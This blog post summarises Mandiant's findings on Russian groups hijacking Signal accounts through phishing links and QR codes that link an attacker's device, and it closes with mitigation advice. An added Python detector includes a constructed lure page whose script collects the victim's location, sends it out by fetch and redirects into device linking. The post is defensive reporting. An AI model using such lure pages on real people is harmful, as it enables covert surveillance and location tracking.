Cyber Syrup

Russian Hackers Exploit Signal's Linked Devices Feature for Espionage


Cybersecurity experts at Mandiant are raising concerns over a sophisticated attack technique being used by Russian-backed hacking groups to intercept encrypted conversations on Signal Messenger. The technique abuses Signal's legitimate linked devices feature, giving adversaries persistent access to a victim's messages without breaking the Signal protocol's encryption.

How Hackers Are Exploiting Signal's Features

In a newly published report, Mandiant threat researcher Dan Black describes how multiple Advanced Persistent Threat (APT) groups have found a way to secretly link their own devices to a victim's Signal account. They do not attack the Signal protocol; they abuse the normal pairing flow, in which the primary device scans a QR code (or opens a linking URI) that identifies the new device. Through phishing, adversaries trick users into scanning a malicious QR code or opening a malicious link, so that the attacker's device is added to the account as a linked endpoint.

Once the link is established, the attacker's device receives its own copy of every message the victim sends or receives, for as long as the link persists. End-to-end encryption is never broken: the attacker has simply become one of the account's legitimate endpoints.

Mandiant warns that Signal’s popularity among military personnel, journalists, activists, and politicians makes it an attractive target for nation-state actors conducting surveillance and espionage operations.

Tactics Used by Russian-Aligned Threat Actors

1. Phishing Campaigns with Malicious QR Codes

Hackers are using a variety of phishing techniques to trick users into linking a compromised device to their Signal account:

  • Fake Signal group invite links embedded in phishing emails and fraudulent websites.

  • Spoofed device-pairing instructions that appear to be legitimate Signal setup pages.

  • Social engineering attacks in which users are convinced to scan a malicious QR code under false pretenses.

2. Targeting Captured Battlefield Devices

Mandiant also uncovered cases where Russian military forces have used captured mobile devices to link a victim's Signal account to attacker-controlled infrastructure, a tactic that requires physical access to an unlocked phone rather than any phishing. This tactic, attributed in particular to the Sandworm hacking group (Mandiant's APT44), enables Russian forces to extract sensitive battlefield intelligence from the account's ongoing conversations.

3. Manipulated Signal Group Invite Pages

Another observed tactic involves modifying legitimate Signal group invitations:

  • Hackers host their own fake invite pages that closely resemble authentic Signal invitations (a genuine invite is an https://signal.group/ link).

  • Instead of taking the user to the group, the page's JavaScript is altered to send the victim's Signal app into the device-linking flow, so that the attacker's device is added to the victim's account.

  • The fraudulent page redirects the victim to Signal's device-linking URI (a deep link handled by the Signal app, not a shell command):
    sgnl://linkdevice?uuid=<attacker-controlled device ID>

4. Targeting Ukrainian Military Personnel

A separate Russian-backed hacking group has specifically targeted the Ukrainian military, using a custom-built phishing kit designed to mimic Kropyva, the artillery guidance software used by Ukraine’s Armed Forces. Attackers attempt to disguise the device-linking process as an invite to a Signal group from a trusted contact.

Additionally, the kit deploys JavaScript payloads that collect:

  • Basic user information

  • Geolocation data (via the browser's Geolocation API, which only returns a position if the victim grants the page's location permission prompt)

Mandiant believes these attacks indicate an increasing focus on location tracking, particularly for military and intelligence-gathering purposes.
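Tactics 1, 3 and 4 all come down to a web page that pushes the victim into Signal's device-linking flow, sometimes with a location-harvesting script alongside. The scanner below is an added example for triaging captured phishing pages; it is not code from Mandiant's report, from this post, or from Signal. It searches the page (and a few decoded copies of it, since a kit may hide the string behind HTML entities or percent-encoding) for the sgnl://linkdevice URI, extracts the device parameters as indicators, tells a real https://signal.group/ invite apart from a linking lure, and flags use of the browser Geolocation API. Assumptions: the input is the page content as captured, the lure carries a pub_key parameter next to uuid as Signal's genuine linking QR codes do (the post shows only uuid), and the sample pages at the bottom are constructed, not real captures.

```python
"""Detect Signal device-linking lures in captured phishing pages.

Added example: not code from the Mandiant report, the Cyber Syrup post
or Signal itself.  It finds the sgnl://linkdevice?uuid=... URI that the
altered invite pages redirect to, decodes the HTML entity and percent
encodings a phishing kit may hide it behind, extracts the device
parameters as indicators, and flags browser Geolocation API use of the
kind described for the Kropyva-themed kit.  Sample pages are constructed.
"""
from __future__ import annotations

import html
import re
from urllib.parse import unquote

# Linking URI named in the report.  Signal's real linking QR codes also
# carry a pub_key parameter next to uuid (assumption used in the samples).
LINKDEVICE_RE = re.compile(r"sgnl://linkdevice\?[^\s'\"<>)]+", re.IGNORECASE)
# A genuine Signal group invite is an https://signal.group/#... link.
GROUP_INVITE_RE = re.compile(r"https://signal\.group/#[A-Za-z0-9_\-+/=]+")
# Browser Geolocation API calls a location-harvesting payload would need.
GEOLOCATION_RE = re.compile(r"navigator\.geolocation\.(getCurrentPosition|watchPosition)")


def _candidate_texts(content: str) -> list[str]:
    """The page as captured plus a few progressively decoded copies."""
    texts = [content]
    current = content
    for _ in range(3):  # bounded so a pathological page cannot loop forever
        decoded = unquote(html.unescape(current))
        if decoded == current:
            break
        texts.append(decoded)
        current = decoded
    return texts


def _parse_query(query: str) -> dict[str, str]:
    """Split a query string by hand: parse_qs would turn '+' into ' ' and
    corrupt base64-encoded values such as the device uuid."""
    params = {}
    for pair in query.split("&"):
        if "=" in pair:
            key, value = pair.split("=", 1)
            params[unquote(key)] = unquote(value)
    return params


def find_linkdevice_uris(content: str) -> list[dict]:
    """Every device-linking URI on the page, de-duplicated by uuid."""
    findings: dict = {}
    for text in _candidate_texts(content):
        for match in LINKDEVICE_RE.finditer(text):
            uri = match.group(0)
            params = _parse_query(uri.split("?", 1)[1])
            uuid = params.get("uuid")
            findings.setdefault(uuid, {"uri": uri, "uuid": uuid,
                                       "pub_key": params.get("pub_key")})
    return list(findings.values())


def collects_geolocation(content: str) -> bool:
    """True if any decoded copy of the page calls the Geolocation API."""
    return any(GEOLOCATION_RE.search(t) for t in _candidate_texts(content))


def classify_page(content: str) -> str:
    """Triage verdict: a page that links a device is never a real invite."""
    if find_linkdevice_uris(content):
        return "device-linking lure"
    if any(GROUP_INVITE_RE.search(t) for t in _candidate_texts(content)):
        return "group invite"
    return "no signal link"


# Constructed samples, not real captures.
LURE_PAGE = """<html><body><h1>You were invited to a Signal group</h1>
<script>
  navigator.geolocation.getCurrentPosition(function (p) {
    fetch("/c?lat=" + p.coords.latitude + "&lon=" + p.coords.longitude);
  });
  window.location = "sgnl://linkdevice?uuid=QXR0YWNrZXJEZXZpY2U%3D&pub_key=BTestKey%2F";
</script></body></html>"""

# Same lure, with the URI percent-encoded twice inside a decodeURIComponent call.
ENCODED_LURE_PAGE = """<a href="#" onclick="location=decodeURIComponent('sgnl%3A%2F%2Flinkdevice%3Fuuid%3DQXR0YWNrZXJEZXZpY2U%253D')">Join group</a>"""

REAL_INVITE_PAGE = '<a href="https://signal.group/#CjQKIExampleInviteFragment">Join</a>'

if __name__ == "__main__":
    for name, page in [("lure", LURE_PAGE), ("encoded lure", ENCODED_LURE_PAGE),
                       ("real invite", REAL_INVITE_PAGE)]:
        print(f"{name}: {classify_page(page)}, geolocation={collects_geolocation(page)}")
        for hit in find_linkdevice_uris(page):
            print("  IOC device uuid:", hit["uuid"], "pub_key:", hit["pub_key"])
```

The uuid pulled out of a lure is the attacker's ephemeral device identifier, so it is worth sharing as an indicator, but a page that reaches the linking URI at all is the real signal: no legitimate group invite ever needs to link a device.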

Implications for Secure Messaging

These attacks illustrate a major security challenge for messaging platforms like Signal, WhatsApp, and Telegram (the last of which only end-to-end encrypts its optional Secret Chats):

  • Encryption remains intact; social engineering gives attackers access without breaking any cryptographic protection, because the attacker's device is enrolled as a legitimate endpoint.

  • Device-linking attacks are difficult to detect: the extra device receives messages through Signal's normal delivery path, and Signal does not police the linked-devices list on the user's behalf, so the link is visible only to a user who checks that list.

  • Surveillance risk is concentrated on high-profile users, who rely on Signal precisely because their communications are sensitive.

Mitigation Strategies for Signal Users

To protect against these attacks, Mandiant recommends that users take the following precautions:

  1. Enable a Screen Lock

    • Use a strong passcode with a mix of uppercase/lowercase letters, numbers, and symbols. This is the main defence against the captured-device tactic above, which needs an unlocked phone to complete a link.

  2. Regularly Audit Linked Devices

    • In Signal settings, navigate to "Linked Devices" to check for unauthorized connections.

    • Immediately remove any unfamiliar devices.

  3. Beware of QR Code Scams

    • Never scan a QR code unless you are certain of its authenticity.

    • Avoid clicking on group invite links from untrusted sources.

  4. Keep Signal Updated

    • Always install the latest version of Signal and keep your operating system updated to minimize vulnerabilities.

Conclusion

Mandiant’s findings underscore how nation-state actors continue to evolve their techniques to compromise secure messaging platforms. While Signal’s encryption remains intact, attackers are exploiting human vulnerabilities through phishing and social engineering to bypass security controls.

For users, particularly those in high-risk environments, maintaining vigilance against phishing attacks and regularly reviewing linked devices is essential to protect sensitive communications from being intercepted.